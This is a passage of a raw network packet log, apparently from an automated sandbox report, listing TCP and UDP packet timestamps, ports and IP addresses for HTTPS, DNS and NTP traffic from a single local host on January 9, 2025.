                                                                                                                                                                Jan 9, 2025 14:43:10.511605978 CET50092443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.511780024 CET50092443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.511799097 CET44350092104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.521163940 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.521220922 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.521289110 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.521590948 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.521605968 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.982230902 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.982316017 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.983735085 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.983743906 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.983999014 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:10.984740019 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.984782934 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:10.984787941 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.298105955 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.298176050 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.298234940 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.298288107 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.298288107 CET50093443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.298311949 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.298322916 CET44350093104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.307039976 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.307097912 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.307183981 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.307456017 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.307471037 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.774266005 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.774365902 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.775562048 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.775573969 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.775820017 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:11.776730061 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.776748896 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:11.776757956 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.105468988 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.105540991 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.105673075 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.105799913 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.105818033 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.105835915 CET50094443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.105842113 CET44350094104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.121226072 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.121278048 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.121357918 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.121824980 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.121834993 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.607125044 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.607238054 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.609388113 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.609401941 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.609658003 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.610738993 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.610812902 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.610851049 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.947014093 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.947083950 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.947145939 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.947293043 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.947310925 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:12.947359085 CET50095443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:12.947365046 CET44350095104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.046310902 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.046371937 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.046449900 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.046771049 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.046785116 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.524061918 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.524132013 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.525532007 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.525538921 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.525815010 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.526607990 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.526709080 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.526746035 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.526829958 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.526855946 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:13.526932955 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:13.526954889 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.035195112 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.035248041 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.035305977 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.035430908 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.035445929 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.035459042 CET50096443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.035465002 CET44350096104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.042972088 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.043010950 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.043080091 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.043982983 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.043994904 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.504004002 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.504321098 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.505597115 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.505624056 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.505862951 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.506964922 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.506966114 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.507055998 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.736063004 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.736131907 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:14.737360954 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.737360954 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:14.737360954 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:15.043407917 CET50097443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:43:15.043442011 CET44350097104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:24.683746099 CET50054443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:43:24.683774948 CET44350054204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:24.746180058 CET50051443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:43:24.746212006 CET44350051204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.732436895 CET50020443192.168.2.7184.51.149.176
                                                                                                                                                                Jan 9, 2025 14:43:34.732474089 CET44350020184.51.149.176192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.732538939 CET50021443192.168.2.7184.51.149.176
                                                                                                                                                                Jan 9, 2025 14:43:34.732564926 CET44350021184.51.149.176192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.732580900 CET50052443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:43:34.732609987 CET44350052104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.732630014 CET50053443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:43:34.732636929 CET44350053104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.732800961 CET50055443192.168.2.7104.70.121.192
                                                                                                                                                                Jan 9, 2025 14:43:34.732808113 CET44350055104.70.121.192192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.733181953 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733221054 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.733323097 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733644962 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733654022 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.187452078 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.193500042 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.193512917 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.194798946 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.194899082 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.195241928 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.195341110 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.246100903 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.246118069 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.293163061 CET50099443192.168.2.7104.70.121.217

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jan 9, 2025 14:41:15.262566090 CET123123192.168.2.7104.40.149.189
                                                                                                                                                                Jan 9, 2025 14:41:15.796591997 CET123123104.40.149.189192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:16.793083906 CET123123192.168.2.7104.40.149.189
                                                                                                                                                                Jan 9, 2025 14:41:16.976675034 CET123123104.40.149.189192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:11.049717903 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                Jan 9, 2025 14:42:21.057095051 CET6276553192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:21.071046114 CET53627651.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:31.491338015 CET6022453192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:31.491509914 CET5815353192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:31.498169899 CET53581531.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:32.696388960 CET5384853192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:32.696909904 CET5126353192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.598686934 CET5448153192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.598921061 CET5983953192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.605421066 CET53598391.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:33.605789900 CET53544811.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:33.610166073 CET5424953192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.610323906 CET5403553192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.617542028 CET53540351.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:33.619101048 CET6553453192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.619242907 CET6072953192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.630526066 CET6225553192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.630708933 CET4993353192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:33.637399912 CET53499331.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.766357899 CET6332653192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.766936064 CET5060453192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.768549919 CET6503953192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.769061089 CET5636553192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.773019075 CET53633261.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.773865938 CET53506041.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.775172949 CET6497853192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.775321007 CET4937653192.168.2.71.1.1.1
                                                                                                                                                                Jan 9, 2025 14:42:35.775511980 CET53650391.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.775551081 CET53563651.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.782345057 CET53649781.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.783341885 CET53493761.1.1.1192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.386332035 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.698733091 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.852771044 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.853344917 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.853420973 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.853465080 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.855263948 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.855568886 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.856059074 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.856425047 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.856869936 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.857002974 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.857223034 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.953156948 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.953186035 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.953196049 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.953206062 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.953289032 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.953846931 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.953950882 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.956825018 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.957886934 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.958528042 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.958755016 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.959482908 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.959846020 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.960099936 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.002806902 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.051609993 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.080020905 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.309247971 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.454102039 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454535961 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454607964 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454643965 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.455018044 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456336021 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456671000 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456671000 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.457287073 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.491430044 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.491624117 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.520122051 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.520256042 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.548434019 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.548630953 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.549973011 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.549988031 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.549995899 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.550005913 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.550018072 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.551357985 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.551407099 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.551408052 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.553009033 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.554989100 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.555107117 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.573980093 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.574525118 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.590380907 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.591641903 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.592547894 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.593034029 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.618808985 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.619401932 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.619895935 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.620068073 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.645031929 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648194075 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648679018 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648829937 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.649260998 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.656043053 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.656832933 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.656884909 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.657371044 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.683640003 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.937994957 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.938373089 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.037256956 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.037837029 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.038018942 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.038431883 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.457026005 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.457256079 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.555881977 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.557559013 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.557579041 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.559021950 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.924864054 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925352097 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925589085 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925774097 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.023674011 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.024774075 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.024787903 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.025082111 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.025202036 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.025274038 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.026297092 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.028745890 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.029876947 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.126811981 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.127584934 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.128598928 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.129453897 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.129616022 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.858908892 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.859040976 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.957554102 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.958420038 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.960875034 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.961070061 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.697797060 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.698272943 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.796813965 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800131083 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800143003 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800582886 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.791963100 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.792756081 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.794047117 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.794655085 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.888844967 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.889652014 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.889882088 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.890054941 CET44361689172.64.41.3192.168.2.7
